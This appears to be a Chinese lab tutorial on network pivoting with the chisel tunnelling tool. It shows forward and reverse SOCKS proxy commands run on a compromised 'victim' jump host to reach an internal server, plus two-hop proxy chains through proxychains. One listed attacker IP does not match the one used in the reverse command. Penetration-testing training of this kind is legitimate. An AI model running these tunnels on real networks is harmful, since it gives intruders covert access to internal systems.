chisel 是一款基于 HTTP 的快速 TCP/UDP 隧道
项目地址:https://github.com/jpillora/chisel/releases
优点:使用 SSH 加密,有比较好的安全性。具有断开等待和重连机制,有比较好的稳定性(类似的 ew 长时间不操作就会断开)。Go 语言编写,支持多平台。单一文件无依赖。
攻击者(kali): 192.168.6.131
受害者(windows): 192.168.6.129
拓扑如下:
攻击者(192.168.6.131)<--> 受害者(192.168.6.129,10.1.1.1)< -- > 内部服务器 (10.1.1.2)
目标访问: 10.1.1.2
一级代理#
正向连接(socks)
跳板机(受害者)
./chisel server -p 12345
攻击者
./chisel client 192.168.6.129:12345 socks
socks 代理绑定在了 1080 端口上,本地只要设置 socks5 代理就可以访问。
反向连接
攻击者(黑客)
./chisel server -p 12345 --reverse --socks5
跳板机(受害者)
chisel.exe client 192.168.6.128:12345 R:socks
攻击者(黑客)访问 10.1.1.2 可以访问。
二级代理#
访问特定端口#
kali:
chisel server -p 3333 --reverse
web01:
开启两个终端,既要运行 client 也要运行 server
chisel server -p 2222 --reverse
chisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555
web02:
chisel client 192.168.150.128:2222 R:5555:192.168.59.129:80
在 kali 上访问 127.0.0.1:1111,即可访问 192.168.59.129 的 80 端口
socks 代理#
kali:
chisel server -p 3333 --reverse
web01:
开启两个终端,既要运行 client 也要运行 server
chisel server -p 2222 --reverse --socks5
chisel client 192.168.126.132:3333 R:1111:socks
web02:
chisel client 192.168.150.128:2222 R:5555:socks
proxychains.conf 文件设置代理链
socks5 127.0.0.1 1111
socks5 127.0.0.1 5555